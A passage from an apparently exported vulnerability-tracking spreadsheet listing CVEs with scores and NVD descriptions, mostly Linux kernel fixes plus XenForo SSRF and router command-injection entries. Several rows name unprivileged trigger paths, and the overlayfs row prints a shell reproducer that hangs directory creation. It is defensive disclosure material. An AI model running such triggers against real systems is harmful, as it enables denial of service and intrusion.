        </is>
      </c>
      <c r="S419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89755</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89758</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mempolicy: skip non-present PMDs when queueing folios
Patch series "mm: handle device-private PMDs in walk callbacks", v3.
Since commit 368076f52ebe ("mm/huge_memory: add device-private THP support
to PMD operations") a PMD may hold a device-private swap entry whenever an
HMM-based GPU driver migrates an anonymous THP folio to device memory via
migrate_vma_pages().
pmd_trans_huge_lock() succeeds for such PMDs (pmd_is_huge() returns true
for any non-present, non-none huge PMD), so several MM walk callbacks that
used to assume present THP or migration entry are now reachable with a
device-private PMD.  The results range from a VM_BUG_ON() firing on debug
kernels, to an oops on a bogus vmemmap dereference, to silently isolating
an unrelated live folio from LRU in the aliasing case.
This patch (of 3):
queue_folios_pmd() is called under pmd_trans_huge_lock(), whose
pmd_is_huge() check returns true for any non-present, non-none PMD
softleaf.  Passing such a PMD to pmd_folio() treats the softleaf encoding
as a hardware PFN and can return a bogus folio pointer.
Mirror queue_folios_pte_range(): handle non-present entries before looking
up a folio.  Keep migration entries counted as failures, but skip other
non-present PMDs such as device-private entries.
Potential trigger: an HMM-based GPU driver migrates an anonymous THP folio
to device memory via migrate_vma_pages(), leaving a device-private PMD. 
Userspace then calls mbind(), migrate_pages() or set_mempolicy_home_node()
on that range.</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89758</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89760</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm, swap: don't free a hibernation slot that is in the swap cache
A slot with a folio in the swap cache is freed when the folio leaves the
cache, not when its count drops.  swap_put_entries_cluster() follows that
rule.  swap_free_hibernation_slot() does not, it calls
__swap_cluster_free_entries() whether or not a folio sits on the slot.
Cluster readahead can put one there.  It walks a raw page_cluster sized
window of offsets around the faulting entry, and a hibernation slot passes
__swap_cache_add_check() because it is not a folio and its count is not
zero.  Freeing the slot then clears the entry under that folio.
The folio is now unreachable from the swap table, and the offset goes back
to the allocator.  The folio is still on the LRU though, so reclaim can
pick it up later.  It then takes the old offset out of folio-&gt;swap and
overwrites the table entry there, which by then may belong to someone
else.
This bug can trigger silent memory corruption, process crashes, or data
instability across completely unrelated userspace applications - typically
occurring when uswsusp is preparing the hibernation image.
I found this while working on giving hibernation slots their own marker in
the swap table, which I had discussed with Kairui. 
(https://lore.kernel.org/linux-mm/abp7aDgYLrxF3Me8@KASONG-MC4/) As far as
I know there are no reports, so there is no Reported-by/Closes to add.
Check for a cached folio before freeing.  The slot is then left in the
ordinary state where only the swap cache holds it, and it is freed when
the folio leaves the cache, either through the reclaim below or through
normal reclaim later.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89760</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89761</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix out-of-bounds write when null terminating a label vec
aa_vec_unique() null terminates at vec[n - dups] when VEC_FLAG_TERMINATE
is passed. If the components are all distinct no duplicates are dropped,
dups is 0 and the terminator goes to vec[n], so the caller has to provide
room for n + 1 entries.
aa_label_strn_parse() sets up its vector with vec_setup(profile, vec, len,
gfp) and then calls aa_vec_unique(vec, len, VEC_FLAG_TERMINATE), but
vec_setup() does not reserve the terminator entry. Up to LOCAL_VEC_ENTRIES
it uses the local array of LOCAL_VEC_ENTRIES pointers, above that it
allocates exactly len pointers. The terminator therefore lands one entry
past the end of the local array when len is LOCAL_VEC_ENTRIES, and one
entry past the end of the allocation when len is larger.
len comes from the number of "//&amp;" separated components in the label name
and label_count_strn_entries() does not bound it. An unprivileged task
reaches the parse by writing to /proc/self/attr/apparmor/current or through
lsm_set_self_attr(2), both of which go through do_setattr(), and the name
is parsed before the change_profile permission is checked.
The query_label() path behind the securityfs .access file, which is
mode 0666, performs no permission check at all. Every component has to
resolve to a loaded profile, so a system with policy loaded is required.
The other two VEC_FLAG_TERMINATE users work on a label vec that
aa_label_alloc() has already sized with "+ 1 for null terminator entry on
vec". Reserve the same entry in vec_setup() and DEFINE_VEC(). Passing
len + 1 from the caller instead would move len == LOCAL_VEC_ENTRIES out of
the local array and into kzalloc().</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89761</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89762</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix cred UAF caused by begin_current_label_crit_section()
AppArmor's begin_current_label_crit_section() is a scary function called
from lots of LSM hooks (in particular VFS/socket-related ones) that checks
if the label referenced by the current creds is marked FLAG_STALE, and if
so, attempts to use aa_replace_current_label() to replace the creds with an
updated version that uses a new label.
The first problem with this is that it would directly lead to UAF of
`struct cred` if anything in the kernel takes a pointer to the current
creds and accesses these past a security hook invocation that replaces
creds, like so:
```
const struct cred *cred = current_cred();
alloc_file_pseudo(...);
uid_t uid = cred-&gt;euid;
```
I don't know if anything in the kernel actually does this, but I think it
is very surprising that this pattern could lead to UAF.
The second problem is that things go wrong when aa_replace_current_label()
runs with overridden credentials. aa_replace_current_label() bails out if
`current_cred() != current_real_cred()` (mirroring the check in
proc_pid_attr_write()), but this check can't actually reliably detect
overridden credentials because the overridden creds can be the same as the
objective creds.
So in approximately the following scenario, things go wrong:
1. task begins with &lt;creds A&gt; (as both objective and subjective creds),
   with refcount=2
2. task grabs an extra reference on &lt;creds A&gt; for overriding
3. task calls override_creds(&lt;creds A&gt;), which returns a pointer to the old
   subjective creds (&lt;creds A&gt;)
4. task enters AppArmor LSM hook
5. AppArmor checks that objective/subjective creds are equal
6. AppArmor replaces both cred pointers with &lt;creds B&gt; and drops 2 refs on
   &lt;creds A&gt;
7. task leaves AppArmor LSM hook
8. task calls revert_creds(&lt;creds A&gt;)
9. now task-&gt;cred is &lt;creds A&gt; while task-&gt;real_cred is &lt;creds B&gt;, but the
   task_struct logically holds two references to &lt;creds B&gt;
10. another task drops the extra reference on &lt;creds A&gt; that was used for
    overriding, refcount drops to 0
11. now task-&gt;real_cred points to freed creds
At this point, any access to current_cred() will be UAF.
I have a test case where I run aa-disable on a profile while a process
using that profile is blocked on splice() from a FUSE passthrough file into
a full pipe; after the profile update, the pipe becomes empty, splice()
resumes, the credentials go out of sync, and a subsequent getuid() syscall
results in a KASAN UAF splat.
To fix this, instead of directly replacing creds, do it via task_work that
will run at the end of the current syscall. (The point in time at which the
cred replacement happens should have no correctness impact; it is just a
performance optimization to avoid unnecessarily touching the refcount of
the new label.)
Note that AppArmor still performs direct cred replacements in the
sb_pivotroot LSM hook after this change, and that direct cred replacements
can still happen in VFS -&gt;write() callbacks via proc_pid_attr_write().
There are two options for what to do with aa_dup_task_ctx(): Either
explicitly reset new-&gt;label_replacement_pending after the entire
aa_task_ctx has been copied, or switch to manually copying members over.
I am switching to manually copying members over because that should make
bugs more obvious.</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89762</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89763</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KEYS: trusted: Fix TPM teardown ordering
trusted_tpm_exit() drops the TPM chip reference and frees the digest
array before unregistering the trusted key type. key_type_lookup()
holds key_types_sem for reading until the key operation finishes, while
unregister_key_type() takes it for writing. It therefore provides the
synchronization point that must precede backend teardown.
The current order permits this interleaving:
  CPU 0                              CPU 1
  trusted_tpm_exit()                 key_type_lookup("trusted")
    put_device(&amp;chip-&gt;dev)             trusted_tpm_seal()
    kfree(digests)                       pcrlock()
    unregister_key_type()                  tpm_pcr_extend(..., digests)
CPU 1 can consequently dereference the freed digest array. The chip can
also be released before callbacks stop using it.
KASAN reported:
  BUG: KASAN: slab-use-after-free in tpm_pcr_extend+0x1f0/0x200
  Read of size 2 at addr ffff88810872d000 by task poc/89
  Call Trace:
    tpm_pcr_extend+0x1f0/0x200
    pcrlock+0x42/0x70 [trusted]
    trusted_tpm_seal+0x1b6/0x570 [trusted]
    trusted_instantiate+0x293/0x340 [trusted]
    __key_instantiate_and_link+0xb2/0x2b0
    __key_create_or_update+0x61e/0xb50
    __do_sys_add_key+0x1b8/0x310
  Allocated by task 88:
    __kmalloc_noprof+0x1a7/0x490
    do_one_initcall+0xa1/0x390
    do_init_module+0x2df/0x840
  Freed by task 90:
    kfree+0x131/0x3c0
    trusted_tpm_exit+0x59/0xa0 [trusted]
    __do_sys_delete_module+0x346/0x510
Move unregister_key_type() before releasing either resource. This stops
new lookups and waits for in-flight key operations to finish before the
backend state is destroyed.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89763</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89764</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rust: devres: fix race between concurrent revokers
There is a potential race condition when two paths try to revoke a
Devres concurrently.
The driver core's devres_release_all() calls Revocable::revoke() via the
release callback, while Devres::drop() calls revoke_nosync() on another
CPU.
The revoker that does not claim the is_available swap returns
immediately, but the revoker that did may still be executing
drop_in_place() on the inner data. This can cause a use-after-free when
the other revoker's caller proceeds to drop adjacent resources that
drop_in_place() still references (e.g., Devres&lt;DmaMappedSgt&gt; racing with
SGTable freeing the backing sg_table and pages).
Fix this by adding a Completion. The release callback signals the
Completion after revoke() finishes, and Devres::drop() waits for it when
it loses the is_available swap. This ensures the wrapped object is fully
torn down before Devres::drop() returns.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89764</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89767</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ovl: fix double end_creating() on the casefold-mismatch path
ovl_create_real() releases the new dentry twice when the casefold
consistency check fails.  The S_IFDIR branch calls end_creating() and
sets err, then falls through to the common out: label which calls
end_creating() on the same dentry again:
	case S_IFDIR:
		newdentry = ovl_do_mkdir(ofs, dir, newdentry, attr-&gt;mode);
		err = PTR_ERR_OR_ZERO(newdentry);
		if (!err &amp;&amp; ofs-&gt;casefold != ovl_dentry_casefolded(newdentry)) {
			pr_warn_ratelimited(...);
			end_creating(newdentry);	/* first */
			err = -EINVAL;
		}
		break;
	...
	if (err)
		goto out;
	...
 out:
	if (err) {
		end_creating(newdentry);	/* second, same dentry */
		return ERR_PTR(err);
	}
end_creating() is end_dirop(), which does inode_unlock() on the parent
and dput() on the dentry, so the parent directory's i_rwsem is unlocked
twice and the dentry is put twice.  The second unlock releases a lock
that is not held, which is what wedges every later creation under that
parent, and the second dput() drops a reference that was never taken.
The branch was added by commit dfc7da402ccc ("ovl: Check for casefold
consistency when creating new dentries") as a bare dput(), which already
released the reference twice; commit fe497f0759e0 ("VFS: change
vfs_mkdir() to unlock on failure.") converted both sites to
end_creating(), adding the double unlock.
This is reachable by an unprivileged user.  The casefold consistency of
the layers is validated at mount time in ovl_parse_layer(), and again on
every lookup in ovl_lookup_single(), but ofs-&gt;workdir is the internal
"work" subdirectory created inside the user-supplied workdir, and that
subdirectory is not re-checked.  Marking it casefolded after the mount
therefore makes every ovl_create_temp() inherit the wrong state - and
that path reaches ovl_create_real() through ovl_start_creating_temp(),
which uses start_creating() with a generated name and so never runs the
lookup-time check.
  unshare -Urm
  mount -t tmpfs -o casefold=utf8-12.1.0 tmpfs mnt
  mkdir -p mnt/lower/d mnt/upper mnt/work mnt/merged
  mount -t overlay ovl -o lowerdir=mnt/lower,\
        upperdir=mnt/upper,workdir=mnt/work mnt/merged
  chattr +F mnt/work/work
  mkdir mnt/merged/d/sub		# directory copy-up
  overlayfs: wrong inherited casefold (work/#5)
and the next copy-up blocks forever on the parent's i_rwsem:
  mkdir           D  start_creating+0x65/0xb0
                     ovl_start_creating_temp+0xb0/0xe0 [overlay]
                     ovl_create_temp+0xa3/0x1d0 [overlay]
                     ovl_copy_up_one+0x1f1c/0x21c0 [overlay]
                     ovl_copy_up_flags+0xf5/0x140 [overlay]
                     ovl_create_object+0xb7/0x220 [overlay]
                     ovl_mkdir+0x23/0x40 [overlay]
Drop the end_creating() from the branch and let out: own the cleanup,
which is what every other error path in this function already does.</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89767</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89771</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Fix subbuf resize race with ring buffer readers
trace_buffer subbuf_size is read lockless in ring_buffer_read_page() and
ring_buffer_read_start(), while it can simultaneously be resized with
ring_buffer_subbuf_order_set().
Instead of trace_buffer::subbuf_size, use bpage::order in
ring_buffer_read_start() and ring_buffer_read_page().
In ring_buffer_read_start(), even with resize_disabled, there is still a
possibility of a race with a buffer modification. Hold the trace_buffer
mutex to synchronise with any pending ring buffer order modification.
trace_buffer::subbuf_size is now actually useless, remove it. Also,
create accessors rb_subbuf_capacity() and rb_page_capacity() which
return the actual size available for storing events, while
rb_subbuf_size() returns the actual subbuf page-size.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89771</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17176</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.036</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>An OS
command injection vulnerability in the TDDP module of Deco BE11000 allows an
adjacent network attacker to execute arbitrary commands with root privileges by
sending a crafted UDP packet.
Successful exploitation may lead to complete
device compromise, including unauthorized command execution, modification of
device settings, and loss of confidentiality, integrity, and availability</t>
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17176</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73315</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a server-side request forgery vulnerability in the PayPal REST webhook handler that allows unauthenticated attackers to cause the server to make outbound HTTP requests to arbitrary destinations by supplying a crafted certificate URL in webhook headers without scheme, hostname, or allowlist validation. Attackers can submit a crafted POST to the PayPal webhook callback endpoint to reach internal network resources including cloud instance metadata services, potentially disclosing IAM credentials or enabling secondary internal service exploitation.</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79637</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R43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430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79637</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80134</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
